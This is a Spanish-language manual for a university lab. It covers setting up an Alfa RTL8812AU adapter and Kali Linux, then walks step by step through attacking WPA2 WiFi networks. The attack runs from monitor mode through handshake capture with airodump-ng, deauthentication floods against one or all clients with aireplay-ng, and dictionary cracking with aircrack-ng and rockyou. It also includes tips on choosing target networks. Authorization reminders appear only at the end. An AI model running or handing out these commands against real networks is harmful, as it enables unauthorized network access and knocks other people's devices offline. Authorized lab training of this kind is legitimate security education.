317 lines
9.6 KiB
Plaintext
317 lines
9.6 KiB
Plaintext
=============================================
|
|
MANUAL PENTESTING WiFi - ALPHA AWUS036ACH
|
|
=============================================
|
|
Chipset: RTL8812AU | Dual-band 2.4/5GHz
|
|
Para laboratorio universitario con Live Boot USB Kali Linux
|
|
|
|
CONTENIDO:
|
|
PARTE 1: Instalar driver en Windows
|
|
PARTE 2: Crear USB bootable de Kali Linux
|
|
PARTE 3: Arrancar Kali desde USB
|
|
PARTE 4: Activar modo monitor
|
|
PARTE 5: Escanear redes WiFi
|
|
PARTE 6: Capturar handshake de una red
|
|
PARTE 7: Ataque de deauth (forzar handshake)
|
|
PARTE 8: Crackear la contraseña
|
|
PARTE 9: Persistencia del USB
|
|
PARTE 10: Resumen de comandos rapidos
|
|
PARTE 11: Tips laboratorio universitario
|
|
|
|
|
|
=============================================
|
|
PARTE 1: INSTALAR DRIVER EN WINDOWS
|
|
=============================================
|
|
|
|
Paso 1: Descargar driver
|
|
Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/
|
|
Descarga el driver Windows (RTL8812AU).
|
|
|
|
Paso 2: Instalar
|
|
1. Desconecta la antena
|
|
2. Ejecuta el instalador como administrador
|
|
3. Reinicia el PC
|
|
4. Conecta la antena despues de reiniciar
|
|
|
|
Paso 3: Verificar
|
|
Abre PowerShell y ejecuta:
|
|
Get-NetAdapter
|
|
Deberias ver "Realtek 8812AU" con estado "Up".
|
|
|
|
En Windows solo puedes escanear redes con Acrylic WiFi Free.
|
|
Para pentesting REAL necesitas Kali Linux (Parte 2).
|
|
|
|
|
|
=============================================
|
|
PARTE 2: CREAR USB BOOTABLE DE KALI LINUX
|
|
=============================================
|
|
|
|
Paso 1: Descargar Kali
|
|
Ve a https://www.kali.org/get-kali/
|
|
Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB)
|
|
|
|
Paso 2: Grabar ISO en USB con Rufus
|
|
Necesitas: USB de 16GB minimo + Rufus
|
|
|
|
1. Descarga Rufus desde https://rufus.ie/
|
|
2. Inserta el USB
|
|
3. Abre Rufus
|
|
4. Device = tu USB
|
|
5. Boot selection = selecciona el ISO de Kali
|
|
6. Partition scheme = MBR
|
|
7. Target system = BIOS o UEFI
|
|
8. Persistent storage -> mueve la barra a 8-12 GB
|
|
>>> ESTO ES LO QUE CREA LA PARTICION PERSISTENTE <<<
|
|
Si no la mueves, TODO se pierde al apagar
|
|
9. Haz clic en START
|
|
10. Selecciona "Write in DD mode" cuando pregunte
|
|
11. Espera a que termine (~10-15 min)
|
|
|
|
|
|
=============================================
|
|
PARTE 3: ARRANCAR KALI DESDE USB
|
|
=============================================
|
|
|
|
Paso 1: Configurar BIOS para arrancar desde USB
|
|
1. Reinicia el PC
|
|
2. Pulsa F2, F12 o DEL al encender (depende del PC)
|
|
3. En BIOS ve a "Boot" o "Boot Order"
|
|
4. Pon "USB-HDD" o "Removable Device" como primera opcion
|
|
5. Guarda y sal (F10 normalmente)
|
|
|
|
Paso 2: Arrancar Kali
|
|
1. En el menu de GRUB selecciona "Live system (amd64)"
|
|
2. Usuario: kali / Contrasena: kali
|
|
|
|
Paso 3: Conectar la antena Alpha
|
|
1. Conecta la Alpha por USB DESPUES de arrancar Kali
|
|
2. Abre terminal y verifica:
|
|
lsusb
|
|
Debe aparecer: Realtek Semiconductor Corp. RTL8812AU
|
|
|
|
3. Verifica la interfaz de red:
|
|
iwconfig
|
|
Debe aparecer: wlan0 o wlan1
|
|
|
|
Si NO aparece wlan0, instala el driver:
|
|
sudo apt update
|
|
sudo apt install -y realtek-rtl88xxau-dkms
|
|
sudo reboot
|
|
|
|
|
|
=============================================
|
|
PARTE 4: ACTIVAR MODO MONITOR
|
|
=============================================
|
|
|
|
El modo monitor permite escuchar TODO el tráfico WiFi
|
|
sin estar conectado a ninguna red. Es la base del pentesting.
|
|
|
|
# 1. Matar procesos que interfieran
|
|
sudo airmon-ng check kill
|
|
|
|
# 2. Activar modo monitor
|
|
sudo airmon-ng start wlan0
|
|
|
|
# 3. Verificar que esta en modo monitor
|
|
iwconfig wlan0mon
|
|
# Debe decir: "Mode: Monitor"
|
|
|
|
Si en vez de wlan0mon aparece wlan0 en modo monitor,
|
|
usa wlan0 en todos los comandos siguientes.
|
|
|
|
SALIR del modo monitor cuando termines:
|
|
sudo airmon-ng stop wlan0mon
|
|
|
|
|
|
=============================================
|
|
PARTE 5: ESCANEAR REDES WiFi
|
|
=============================================
|
|
|
|
Este es el paso mas importante. Aqui ves TODAS las redes
|
|
a tu alrededor.
|
|
|
|
sudo airodump-ng wlan0mon
|
|
|
|
Veras una tabla con estas columnas:
|
|
|
|
BSSID = MAC del punto de acceso (router)
|
|
PWR = Potencia de señal (-30=excelente, -90=malo)
|
|
Beacons = Paquetes beacon recibidos
|
|
#Data = Paquetes de datos capturados
|
|
CH = Canal (1-13 en 2.4GHz, 36-165 en 5GHz)
|
|
ENC = Cifrado (WPA2, WPA3, OPN=abierto)
|
|
ESSID = Nombre de la red WiFi
|
|
|
|
PARA PARAR: pulsa Ctrl+C
|
|
|
|
CONSEJOS para elegir red objetivo:
|
|
- PWR entre -30 y -60 = buena señal (lo ideal)
|
|
- #Data alto = hay trafico (clientes activos)
|
|
- ENC = WPA2 (es el mas comun, se puede crackear)
|
|
- Evita OPN (abierto) y WPA3 (dificil)
|
|
|
|
|
|
=============================================
|
|
PARTE 6: CAPTURAR HANDSHAKE DE UNA RED
|
|
=============================================
|
|
|
|
Una vez que has elegido tu red objetivo (por ejemplo
|
|
"CampusLab" en canal 6 con BSSID AA:BB:CC:DD:EE:FF),
|
|
|
|
abre UNA NUEVA terminal (no cierres la de escaneo)
|
|
y ejecuta:
|
|
|
|
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
|
|
|
|
REEMPLAZA:
|
|
- "6" por el canal de tu red objetivo
|
|
- "AA:BB:CC:DD:EE:FF" por el BSSID de tu red
|
|
- "captura" es el nombre del archivo donde guardara datos
|
|
|
|
Este comando:
|
|
1. Escucha SOLO esa red en su canal
|
|
2. Guarda todo en archivos: captura-01.cap, captura-01.csv
|
|
3. Espera a que aparezca un "WPA handshake"
|
|
|
|
El WPA handshake aparece arriba a la derecha:
|
|
WPA handshake: AA:BB:CC:DD:EE:FF
|
|
|
|
ESTO ES LO QUE NECESITAS para crackear la contrasena.
|
|
|
|
Si no aparece el handshake, necesitas un cliente
|
|
conectandose. Sigue en la Parte 7 para forzarlo.
|
|
|
|
|
|
=============================================
|
|
PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE)
|
|
=============================================
|
|
|
|
Si el handshake no aparece solo, puedes FORZAR a un
|
|
cliente a reconectarse. Esto le desconecta momentaneamente
|
|
y al reconectarse se captura el handshake.
|
|
|
|
ABRE UNA TERCERA terminal y ejecuta:
|
|
|
|
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon
|
|
|
|
REEMPLAZA:
|
|
- "5" = numero de paquetes de deauth (5-10 suele bastar)
|
|
- "AA:BB:CC:DD:EE:FF" = BSSID del router (igual que antes)
|
|
- "XX:XX:XX:XX:XX:XX" = MAC del cliente conectado
|
|
|
|
Para ver clientes conectados a tu red, mira la terminal
|
|
de la Parte 6. Bajo la columna "STATION" veras las MAC
|
|
de los clientes conectados.
|
|
|
|
Si no sabes la MAC del cliente, puedes omitir -c:
|
|
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
|
|
|
|
Esto envia deauth a TODOS los clientes de esa red.
|
|
|
|
VERIFICA que aparezca "WPA handshake" en la terminal
|
|
de la Parte 6 despues del ataque.
|
|
|
|
|
|
=============================================
|
|
PARTE 8: CRACKEAR LA CONTRASEÑA
|
|
=============================================
|
|
|
|
Una vez tengas el WPA handshake capturado:
|
|
|
|
Paso 1: Descomprimir el diccionario
|
|
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
|
|
|
|
Paso 2: Ejecutar aircrack-ng
|
|
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
|
|
|
|
Sustituye "captura-01.cap" por el nombre de tu archivo.
|
|
|
|
Esto prueba TODAS las contrasenas del diccionario contra
|
|
el handshake capturado. Velocidad: ~1000-5000 claves/segundo.
|
|
|
|
Si la contrasena esta en el diccionario veras:
|
|
KEY FOUND! [ la_contrasena ]
|
|
|
|
Si no esta en el diccionario:
|
|
- Prueba con otro diccionario mas grande
|
|
- O usa fuerza bruta (mucho mas lento):
|
|
aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap
|
|
|
|
|
|
=============================================
|
|
PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)
|
|
=============================================
|
|
|
|
Si usas Kali Live, al reiniciar TODO se pierde
|
|
a menos que tengas persistencia.
|
|
|
|
Opcion A - Rufus Persistent Partition (ya lo hiciste en Parte 2)
|
|
Si activaste "Persistent storage" en Rufus, los archivos en
|
|
/home/kali se guardan automaticamente entre reinicios.
|
|
|
|
Opcion B - Montar particion persistente manualmente:
|
|
sudo mkdir -p /mnt/persistence
|
|
sudo mount /dev/sdb3 /mnt/persistence
|
|
cp captura-01.cap /mnt/persistence/
|
|
echo "RED: CampusLab | PASS: la_contrasena" > /mnt/persistence/wifi_cracked.txt
|
|
sudo umount /mnt/persistence
|
|
|
|
Opcion C - Segundo USB o red:
|
|
cp captura-01.cap /media/kali/MI_USB/
|
|
# O subir a un servidor:
|
|
scp captura-01.cap user@ip_servidor:/ruta/
|
|
|
|
|
|
=============================================
|
|
PARTE 10: RESUMEN DE COMANDOS RAPIDOS
|
|
=============================================
|
|
|
|
Ver antena: lsusb && iwconfig
|
|
Matar interferencias: sudo airmon-ng check kill
|
|
Activar monitor: sudo airmon-ng start wlan0
|
|
Escanear redes: sudo airodump-ng wlan0mon
|
|
Capturar 1 red: sudo airodump-ng -c CH --bssid MAC -w file wlan0mon
|
|
Deauth 1 cliente: sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon
|
|
Crackear: aircrack-ng -w rockyou.txt file.cap
|
|
Salir monitor: sudo airmon-ng stop wlan0mon
|
|
|
|
|
|
=============================================
|
|
PARTE 11: TIPS PARA EL LABORATORIO UNIVERSITARIO
|
|
=============================================
|
|
|
|
1. Empieza solo con escaneo pasivo (airodump-ng) - aprende
|
|
a leer las redes antes de hacer nada activo.
|
|
|
|
2. Documenta que redes hay, en que canales, que cifrado usan.
|
|
|
|
3. Solo testea redes que tengas autorizacion explicita -
|
|
pide al profesor/encargado por escrito.
|
|
|
|
4. Practica primero con tu propio router si puedes.
|
|
|
|
5. El rockyou.txt viene en Kali en /usr/share/wordlists/
|
|
(descomprimir con sudo gunzip).
|
|
|
|
6. No hagas deauth en redes publicas reales - es ilegal
|
|
sin autorizacion.
|
|
|
|
7. Si la senal es mala (PWR < -70), acercate al router
|
|
o usa la antena con el reflector parabolico.
|
|
|
|
|
|
=============================================
|
|
LEER ESTE MANUAL DESDE KALI LIVE
|
|
=============================================
|
|
|
|
Si copiaste este archivo al USB de Kali, puedes leerlo
|
|
desde la terminal con:
|
|
|
|
sudo mount /dev/sdb1 /mnt
|
|
cat /mnt/MANUAL_PENTEST.txt
|
|
|
|
O para verlo pagina por pagina:
|
|
cat /mnt/MANUAL_PENTEST.txt | less
|
|
|
|
Para copiarlo al escritorio de Kali:
|
|
cp /mnt/MANUAL_PENTEST.txt ~/Desktop/
|